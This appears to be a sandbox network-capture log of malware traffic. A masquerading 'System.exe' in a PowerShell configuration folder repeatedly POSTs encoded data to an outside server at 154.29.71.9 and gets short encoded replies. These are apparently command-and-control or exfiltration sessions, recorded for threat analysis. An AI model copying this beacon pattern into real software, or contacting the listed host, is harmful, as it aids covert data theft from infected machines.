                                                                                                    Date: Sat, 04 Jan 2025 13:53:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    100 | 192.168.2.4 | 50040 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:36.074464083 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:36.426332951 CET | 2600 | OUT | Data Raw: 59 5b 5d 58 5b 5f 5d 56 5b 59 5a 55 50 5d 5b 51 56 53 54 42 52 5b 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y[]X[_]V[YZUP][QVSTBR[R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,.)1+%=.<Y(=+'+;#5")82U([//"Y ']/0
                                                                                                    Jan 4, 2025 14:53:36.712251902 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:36.746999979 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    101 | 192.168.2.4 | 50045 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:36.868362904 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    102 | 192.168.2.4 | 50051 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:37.182518005 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:37.535873890 CET | 1856 | OUT | Data Raw: 59 5a 5d 5f 5b 5b 5d 51 5b 59 5a 55 50 59 5b 5a 56 5c 54 49 52 58 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZ]_[[]Q[YZUPY[ZV\TIRXRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y/=![2">(+['0(8Y,3.Q -Q!^9U=<C204Y.?"Y ']/
                                                                                                    Jan 4, 2025 14:53:37.709362030 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:37.843972921 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 11 32 07 3d 0d 32 04 30 50 2e 3c 3d 52 3f 09 36 40 2c 5b 3b 00 3f 5c 3b 19 2c 0d 23 1d 3e 16 08 42 3e 22 23 53 32 2f 02 13 3c 1c 20 51 03 12 24 00 32 39 26 10 2a 1d 0c 07 2e 3e 0e 40 22 0f 3c 05 27 3a 22 11 21 13 22 05 24 3f 00 09 2a 01 3d 1c 2e 58 30 06 2d 23 02 1d 3f 15 23 55 0b 1f 26 0b 30 0f 20 57 32 2b 24 11 3c 23 27 06 2b 2a 0e 0f 21 29 3b 02 25 00 35 01 24 57 3d 55 24 08 2e 04 26 23 25 5e 21 07 2f 5c 25 2a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"2=20P.<=R?6@,[;?\;,#>B>"#S2/< Q$29&*.>@"<':"!"$?*=.X0-#?#U&0 W2+$<#'+*!);%5$W=U$.&#%^!/\%*.S.-W=YL0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    103 | 192.168.2.4 | 50052 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:37.317040920 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:37.676373959 CET | 2600 | OUT | Data Raw: 59 58 5d 58 5e 58 58 54 5b 59 5a 55 50 59 5b 5a 56 55 54 47 52 5c 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YX]X^XXT[YZUPY[ZVUTGR\R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/%(:*.((7W$;0;#.6;V"(=T). &#8]-"Y ']/
                                                                                                    Jan 4, 2025 14:53:37.833810091 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:37.962261915 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    104 | 192.168.2.4 | 50058 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:38.142982960 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:38.488826036 CET | 2600 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:38.688193083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:38.823826075 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    105 | 192.168.2.4 | 50064 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:38.982894897 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:39.332539082 CET | 2600 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:39.506455898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:39.638025999 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    106 | 192.168.2.4 | 50070 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:39.798650026 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:40.145097971 CET | 2600 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:40.326376915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:40.456005096 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    107 | 192.168.2.4 | 50076 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:40.588589907 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:40.941941977 CET | 2600 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:41.125070095 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:41.257956982 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    108 | 192.168.2.4 | 50078 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:41.533159971 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2592
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:41.879441023 CET | 2592 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:42.046262026 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:42.174917936 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    109 | 192.168.2.4 | 50084 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:42.362409115 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:42.708184004 CET | 2600 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:42.879360914 CET | 1236 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:43.379405022 CET | 1236 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:43.492743969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:43.492861032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:43.493050098 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    110 | 192.168.2.4 | 50087 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:43.495663881 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:43.848431110 CET | 1856 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:44.030515909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:44.161690950 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 5b 31 39 31 0e 25 2e 2c 1d 2d 2f 3d 52 28 09 3e 44 3b 03 23 02 3c 2a 02 07 2f 0a 3f 59 29 3b 2e 41 29 0f 37 53 32 3f 2c 5b 28 26 20 51 03 12 27 11 24 29 2a 5b 3e 33 2e 06 2d 00 30 0b 35 08 38 04 25 14 26 5a 22 13 04 04 25 11 36 09 3e 3c 26 0f 2d 00 02 02 3a 30 2c 53 3f 3f 23 55 0b 1f 26 0b 25 31 1d 0f 26 28 16 10 28 33 37 06 3f 14 27 1d 34 04 2c 11 31 2d 29 06 27 08 36 0d 30 32 3a 07 30 33 08 06 22 07 2c 00 32 2a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"[191%.,-/=R(>D;#<*/?Y);.A)7S2?,[(& Q'$)*[>3.-058%&Z"%6><&-:0,S??#U&%1&((37?'4,1-)'602:03",2*.S.-W=YL0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    111 | 192.168.2.4 | 50088 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:43.495697021 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:43.848431110 CET | 2596 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:44.022209883 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:44.152064085 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    112 | 192.168.2.4 | 50092 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:44.449529886 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:44.801306009 CET | 2600 | OUT | Data Raw: [request body bytes]
                                                                                                    Jan 4, 2025 14:53:44.977145910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:45.107897997 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
113  192.168.2.4  50103  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:45.257313013 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:45.793041945 CET  25  IN  HTTP/1.1 100 Continue
Jan 4, 2025 14:53:45.925911903 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
114  192.168.2.4  50109  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:46.053736925 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:46.580801964 CET  25  IN  HTTP/1.1 100 Continue
Jan 4, 2025 14:53:46.712202072 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
115  192.168.2.4  50111  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:47.182833910 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:47.714724064 CET  25  IN  HTTP/1.1 100 Continue
Jan 4, 2025 14:53:47.849153996 CET  200  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
116  192.168.2.4  50120  154.29.71.9  80  5796  C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp  Bytes transferred  Direction  Data
Jan 4, 2025 14:53:47.976706028 CET  395  OUT  POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
